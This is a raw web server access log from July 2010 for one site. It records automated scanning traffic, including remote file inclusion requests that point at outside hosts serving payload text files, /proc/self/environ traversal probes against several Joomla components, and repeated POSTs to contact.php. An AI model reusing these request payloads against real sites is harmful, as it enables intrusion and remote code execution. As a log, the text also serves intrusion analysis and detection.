74.52.48.66 - - [25/Jul/2010:20:44:58 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:44:58 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7664 "-" "Mozilla/5.0" "www.galf.org"
74.52.48.66 - - [25/Jul/2010:20:45:53 -0700] "GET /logs/access_100531.log%20%20//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:20:46:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:20:46:15 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:20:46:15 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:20:46:35 -0700] "GET /logs/access_100201.log//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:20:46:36 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:20:46:36 -0700] "GET /logs//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:47:01 -0700] "GET /logs/access.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:47:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:47:02 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.808" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:20:47:27 -0700] "GET /logs/access_100201.log//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:20:47:27 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
78.41.233.128 - - [25/Jul/2010:20:47:28 -0700] "GET /logs//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:20:47:37 -0700] "GET /logs/access_100201.log//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:20:47:37 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.121.67.226 - - [25/Jul/2010:20:47:38 -0700] "GET /logs//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:47:38 -0700] "GET /logs/access.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:47:39 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 1032 "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:47:39 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 7643 "-" "libwww-perl/5.808" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:20:47:44 -0700] "GET /logs/access_100201.log//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:20:47:44 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
94.247.176.194 - - [25/Jul/2010:20:47:44 -0700] "GET /logs//index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.235.44.160 - - [25/Jul/2010:20:48:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
212.235.44.160 - - [25/Jul/2010:20:48:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:15 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:15 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:15 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:15 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:16 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:49:16 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:04 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:04 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:51:04 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
216.227.218.75 - - [25/Jul/2010:20:51:45 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
216.227.218.75 - - [25/Jul/2010:20:51:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
216.227.218.75 - - [25/Jul/2010:20:51:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
67.195.115.245 - - [25/Jul/2010:20:52:22 -0700] "GET /logs/access_100201.log HTTP/1.0" 200 7267620 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
120.50.34.74 - - [25/Jul/2010:20:52:26 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.831" "www.galf.org"
120.50.34.74 - - [25/Jul/2010:20:52:26 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:52:29 -0700] "GET /logs/access_100719.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:52:29 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:52:29 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:52:29 -0700] "GET /logs/access_100719.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:52:30 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:52:30 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:49 -0700] "POST /logs/access_100524.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /logs/access_100524.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /logs/access_100524.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /logs/access_100524.log%20%20//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:50 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:52:51 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:20:54:36 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:20:54:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.34.172.171 - - [25/Jul/2010:20:54:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:20:56:21 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:20:56:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
93.114.41.85 - - [25/Jul/2010:20:56:21 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:56:21 -0700] "GET /logs/access_091207.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:56:29 -0700] "GET /logs/access.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
114.108.176.9 - - [25/Jul/2010:20:56:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:20:57:03 -0700] "GET /logs/access_091102.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:57:27 -0700] "GET /logs/access.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
202.160.123.72 - - [25/Jul/2010:20:57:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:57:57 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:57:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:57:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:58:00 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:58:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
77.221.145.35 - - [25/Jul/2010:20:58:00 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:20:58:58 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:20:58:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
109.235.249.248 - - [25/Jul/2010:20:58:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:21:00:14 -0700] "GET /logs/access_091207.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:21:01:04 -0700] "GET /logs/access_091102.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:21:02:19 -0700] "GET /logs/access_100705.log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:21:02:19 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:21:02:19 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.834" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:21:02:35 -0700] "GET /logs/access_090928.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.202.108.90 - - [25/Jul/2010:21:02:35 -0700] "GET /logs//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.202.108.90 - - [25/Jul/2010:21:02:35 -0700] "GET /include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.127.248.175 - - [25/Jul/2010:21:03:33 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:21:03:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:21:03:34 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:21:04:07 -0700] "GET /logs/access_100712.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.115.111.245 - - [25/Jul/2010:21:04:34 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:21:05:06 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.831" "www.galf.org"
99.198.108.74 - - [25/Jul/2010:21:05:06 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
193.224.193.84 - - [25/Jul/2010:21:05:20 -0700] "POST /logs/access_100329.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
193.224.193.84 - - [25/Jul/2010:21:05:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
193.224.193.84 - - [25/Jul/2010:21:05:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:21:05:26 -0700] "GET /logs/access_090921.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.202.108.90 - - [25/Jul/2010:21:05:53 -0700] "GET /logs/access_091228.log//include/write.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
120.50.34.74 - - [25/Jul/2010:21:08:58 -0700] "GET /logs/access_100705.log/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
120.50.34.74 - - [25/Jul/2010:21:08:58 -0700] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
120.50.34.74 - - [25/Jul/2010:21:08:59 -0700] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.831" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:30 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:30 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:31 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:31 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:31 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:32 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:32 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:33 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:36 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:38 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
83.239.206.122 - - [25/Jul/2010:21:10:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
